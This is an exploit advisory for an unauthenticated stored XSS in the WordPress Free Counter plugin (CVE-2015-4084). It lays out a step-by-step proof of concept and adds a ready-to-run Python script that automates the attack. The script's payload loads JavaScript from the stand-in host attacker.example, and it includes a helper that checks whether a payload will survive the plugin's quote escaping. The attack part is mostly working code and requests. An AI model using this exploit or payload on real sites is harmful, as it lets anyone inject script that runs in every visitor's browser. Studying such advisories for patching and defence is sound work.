Exploit Title: WordPress Free Counter Plugin [Stored XSS]
Date: 2015/05/25
Exploit Author: Panagiotis Vagenas
Version: 1.1
Tested on: WordPress 4.2.2
Category: webapps
CVE: CVE-2015-4084
- Description
Any user, authenticated or not, can perform a stored XSS attack simply by exploiting the wp_ajax_nopriv_check_stat action (the `nopriv` hook is what makes it reachable without a login).
The plugin uses a widget to display the website's visit count, so any page that renders this widget will also load the malicious JS code.
- Proof of Concept
- Send a POST request to `http://www.free-counter.org/Api.php` to obtain the counter id of the vulnerable site. The POST data must contain the following vars: `action=create_new_counter&site_url=http%3A%2F%2Fmy.vulnerable.website.com`
- The response is a serialized PHP array; the value we need is `counter_id`.
- Send a POST request to `http://my.vulnerable.website.com/wp-admin/admin-ajax.php` with data: `action=check_stat&id_counter=<counter_id from step 2>&value_=<script>alert(1)</script>`
- Visit any page of the infected website that displays the plugin's widget; the injected script executes.
Note that the plugin stores the POSTed value via the update_option function, so quotes in the submitted value end up backslash-escaped in the database and any payload that relies on them breaks. A malicious user can simply omit the quotes, e.g. around the src attribute of the script tag (`<script src=http://...>`); modern browsers parse an unquoted attribute value as if the quotes were there.
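The following script is an added example that is not part of the original advisory. It walks the two-step PoC above (counter id lookup, then the unauthenticated `check_stat` call) and also demonstrates the quote-escaping caveat by emulating PHP's addslashes() on two candidate payloads. The serialized response body, the attacker host `attacker.example` and the exact key layout of the counter API response are constructed for illustration; the advisory only says the response is a serialized array containing `counter_id`. The network calls run only when the file is executed directly.

```python
"""Added example for the Free Counter stored XSS PoC (not the advisory's own code)."""
import urllib.parse
import urllib.request

COUNTER_API = "http://www.free-counter.org/Api.php"      # from the advisory
TARGET = "http://my.vulnerable.website.com"              # placeholder site from the advisory
# Quote-free on purpose: quotes would be backslash-escaped on storage.
# attacker.example is a hypothetical host.
PAYLOAD = "<script src=http://attacker.example/x.js></script>"

# Constructed sample of what the counter API might return; the real
# response layout is not documented in the advisory beyond 'counter_id'.
SAMPLE_RESPONSE = b'a:2:{s:10:"counter_id";i:1234;s:6:"status";s:2:"ok";}'


def php_unserialize_flat(data: bytes) -> dict:
    """Minimal parser for a one-level PHP-serialized array of scalars (i/s/b).

    Handles only what the PoC needs: a:N:{key;value;...} with int, string
    and bool members. Raises ValueError on anything else.
    """
    pos = 0

    def read_scalar():
        nonlocal pos
        t = data[pos:pos + 1]
        if t == b"i":                                   # i:<int>;
            end = data.index(b";", pos)
            v = int(data[pos + 2:end])
            pos = end + 1
            return v
        if t == b"s":                                   # s:<len>:"<bytes>";
            colon = data.index(b":", pos + 2)
            n = int(data[pos + 2:colon])
            start = colon + 2                           # skip ':"'
            v = data[start:start + n].decode()
            pos = start + n + 2                         # skip '";'
            return v
        if t == b"b":                                   # b:0; / b:1;
            v = data[pos + 2:pos + 3] == b"1"
            pos += 4
            return v
        raise ValueError(f"unsupported type {t!r} at offset {pos}")

    if data[:2] != b"a:":
        raise ValueError("not a serialized PHP array")
    brace = data.index(b"{")
    count = int(data[2:brace - 1])                      # 'a:N:{' -> N
    pos = brace + 1
    out = {}
    for _ in range(count):
        key = read_scalar()
        out[key] = read_scalar()
    return out


def counter_id_from_response(body: bytes) -> int:
    """Step 2 of the PoC: pull counter_id out of the API response."""
    return int(php_unserialize_flat(body)["counter_id"])


def build_create_counter_request(site_url: str):
    """Step 1: POST body that asks the counter service for the site's counter id."""
    data = urllib.parse.urlencode({"action": "create_new_counter",
                                   "site_url": site_url}).encode()
    return COUNTER_API, data


def build_check_stat_request(target: str, counter_id: int, payload: str):
    """Step 3: the unauthenticated admin-ajax.php call that stores the payload."""
    data = urllib.parse.urlencode({"action": "check_stat",
                                   "id_counter": counter_id,
                                   "value_": payload}).encode()
    return target.rstrip("/") + "/wp-admin/admin-ajax.php", data


def wp_addslashes(s: str) -> str:
    """Emulates PHP addslashes(), the escaping the stored value undergoes."""
    return (s.replace("\\", "\\\\").replace("'", "\\'")
             .replace('"', '\\"').replace("\0", "\\0"))


def survives_slashing(payload: str) -> bool:
    """True if the payload reaches the page unchanged (no characters to escape)."""
    return wp_addslashes(payload) == payload


def post(url: str, data: bytes) -> bytes:
    req = urllib.request.Request(url, data=data,
                                 headers={"User-Agent": "Mozilla/5.0"})
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read()


if __name__ == "__main__":
    url, body = build_create_counter_request(TARGET)
    cid = counter_id_from_response(post(url, body))
    url, body = build_check_stat_request(TARGET, cid, PAYLOAD)
    print(post(url, body))
```

The `survives_slashing` check is the practical test to run on any payload before sending it: a quoted `src="..."` variant fails it, the unquoted one in `PAYLOAD` passes, which is exactly why the advisory recommends dropping the quotes.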
- Solution
No official solution yet exists.